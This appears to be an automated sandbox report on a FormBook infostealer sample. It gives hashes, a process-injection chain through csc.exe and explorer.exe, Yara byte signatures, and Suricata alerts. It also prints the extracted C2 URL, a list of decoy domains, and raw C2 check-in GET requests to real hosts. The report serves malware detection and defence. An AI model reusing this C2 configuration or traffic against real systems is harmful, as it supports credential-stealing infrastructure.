Windows Analysis Report
kHslwiV2w6.exe

Overview

General Information

Sample name: kHslwiV2w6.exe
Analysis ID: 1529053
MD5: 3364dc2488f8444000a9da4c6d999fc4
SHA1: 19cf9bd0f6976d75f7738ec74d2b326edee5bdde
SHA256: fcf632af143e88dfba5e9256d0fb238eb314b0d20e63141cb659ed7ad001cbb4

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • kHslwiV2w6.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\kHslwiV2w6.exe" MD5: 3364DC2488F8444000A9DA4C6D999FC4)
    • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • iexplore.exe (PID: 8164 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: BBF55D48A97497F61781C226E1CEDE6A)
    • csc.exe (PID: 1408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • explorer.exe (PID: 4828 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • raserver.exe (PID: 6624 cmdline: "C:\Windows\SysWOW64\raserver.exe" MD5: D1053D114847677185F248FF98C3F255)
          • cmd.exe (PID: 4064 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}
Source | Rule | Description | Author | Strings
00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      3.2.csc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      3.2.csc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.csc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          3.2.csc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.csc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-10-08T16:01:28.541848+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49751 | 91.195.240.19 | 80 | TCP
          2024-10-08T16:01:28.541848+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49739 | 52.206.163.162 | 80 | TCP
          2024-10-08T16:01:28.541848+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49743 | 104.247.81.174 | 80 | TCP
          2024-10-08T16:01:28.541848+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49745 | 198.185.159.144 | 80 | TCP
          2024-10-08T16:02:10.388618+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49736 | 172.66.0.70 | 80 | TCP
          2024-10-08T16:02:32.269097+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49738 | 104.18.188.223 | 80 | TCP
          2024-10-08T16:03:11.963231+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49740 | 198.185.159.144 | 80 | TCP
          2024-10-08T16:03:32.429473+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49741 | 172.67.143.211 | 80 | TCP
          2024-10-08T16:03:54.707781+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49742 | 103.235.47.188 | 80 | TCP
          2024-10-08T16:04:54.803703+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49744 | 13.248.252.114 | 80 | TCP
          2024-10-08T16:06:37.473281+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49746 | 172.67.130.46 | 80 | TCP
          2024-10-08T16:06:58.163499+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49747 | 63.141.128.16 | 80 | TCP
          2024-10-08T16:07:18.445512+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49748 | 13.248.169.48 | 80 | TCP
          2024-10-08T16:07:41.823141+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49749 | 3.33.130.190 | 80 | TCP
          2024-10-08T16:09:01.277884+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49750 | 192.250.227.27 | 80 | TCP
          2024-10-08T16:10:24.466524+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49752 | 13.248.252.114 | 80 | TCP

          AV Detection

          Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: FormBook
          Source: kHslwiV2w6.exe ReversingLabs: Detection: 47%
          Source: Yara match File source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D20115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1FD30 CryptExportKey,GetLastError,malloc,CryptExportKey,GetLastError,free
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1DAFB CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1FA58 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGenKey,GetLastError,GetLastError
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1FE35 CryptBinaryToStringW,GetLastError,malloc,CryptBinaryToStringW,GetLastError,free,SysFreeString
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D20383 SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 5_2_00D1FF58 CryptStringToBinaryW,GetLastError,malloc,CryptStringToBinaryW,GetLastError
          Source: kHslwiV2w6.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdb source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdbGCTL source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdb source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: csc.pdbF source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then mov rax, rcx 0_2_00007FF72F619FC0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then push rbx 0_2_00007FF72F65CC30
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF72F687A90
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then push rbx 0_2_00007FF72F62FAA0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF72F62F9C0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then push rdi 0_2_00007FF72F684450
          Source: C:\Users\user\Desktop\kHslwiV2w6.exe Code function: 4x nop then push rdi 0_2_00007FF72F680200
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 4x nop then pop esi 3_2_0041731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 4x nop then pop ebx 3_2_00407B20
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 4x nop then pop esi 5_2_00C6731B
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 4x nop then pop ebx 5_2_00C57B22

          Networking

          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49752 -> 13.248.252.114:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49744 -> 13.248.252.114:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49752 -> 13.248.252.114:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49749 -> 3.33.130.190:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49752 -> 13.248.252.114:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49746 -> 172.67.130.46:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49749 -> 3.33.130.190:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49744 -> 13.248.252.114:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49749 -> 3.33.130.190:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49746 -> 172.67.130.46:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49741 -> 172.67.143.211:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49746 -> 172.67.130.46:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49741 -> 172.67.143.211:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49744 -> 13.248.252.114:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49741 -> 172.67.143.211:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49736 -> 172.66.0.70:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49736 -> 172.66.0.70:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49736 -> 172.66.0.70:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49738 -> 104.18.188.223:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49738 -> 104.18.188.223:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49738 -> 104.18.188.223:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49740 -> 198.185.159.144:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49740 -> 198.185.159.144:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49740 -> 198.185.159.144:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49742 -> 103.235.47.188:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49742 -> 103.235.47.188:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49742 -> 103.235.47.188:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49747 -> 63.141.128.16:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49747 -> 63.141.128.16:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49747 -> 63.141.128.16:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49750 -> 192.250.227.27:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49750 -> 192.250.227.27:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49750 -> 192.250.227.27:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49751 -> 91.195.240.19:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49751 -> 91.195.240.19:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49751 -> 91.195.240.19:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49739 -> 52.206.163.162:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49739 -> 52.206.163.162:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49739 -> 52.206.163.162:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49743 -> 104.247.81.174:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49743 -> 104.247.81.174:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49743 -> 104.247.81.174:80
          Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49745 -> 198.185.159.144:80
          Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49745 -> 198.185.159.144:80
          Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.11.20:49745 -> 198.185.159.144:80
          Source: C:\Windows\explorer.exe Network Connect: 172.66.0.70 80
          Source: Malware configuration extractor URLs: www.upcyclecharms.com/md02/
          Source: DNS query: www.yeslabs.xyz
          Source: DNS query: www.woby.xyz
          Source: DNS query: www.j3k7n.xyz
          Source: DNS query: www.coinbureau.xyz
          Source: global traffic HTTP traffic detected: GET /md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXY HTTP/1.1 Host: www.andrewghita.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /md02/?all=VJE6G0uhaXXjZ9YRdQlMdfAmJtBHOO9P9ftsD0Za8iws3BCdMQRNDr5e7yfdzu876eSq&P6=6lUxOJCX68zXY HTTP/1.1 Host: www.attorney-services-8344642.zone Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /md02/?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXY HTTP/1.1 Host: www.yeslabs.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /md02/?all=ItgQDVkBdIs0QziWKwlLzzQfsI1xbGOZBoDnu4i2Zg+9o67qJyVsSqA76p+pq/A3lGOx&P6=6lUxOJCX68zXY HTTP/1.1 Host: www.vizamag.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /md02/?all=PZp0UtAd/MX+bbfmlI0lLX5uB5dB2ubu0xorlIAgjhA6JQ6omJZi4VnySSsC/hEyaNVU&P6=6lUxOJCX68zXY HTTP/1.1 Host: www.tigajco69.fun Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
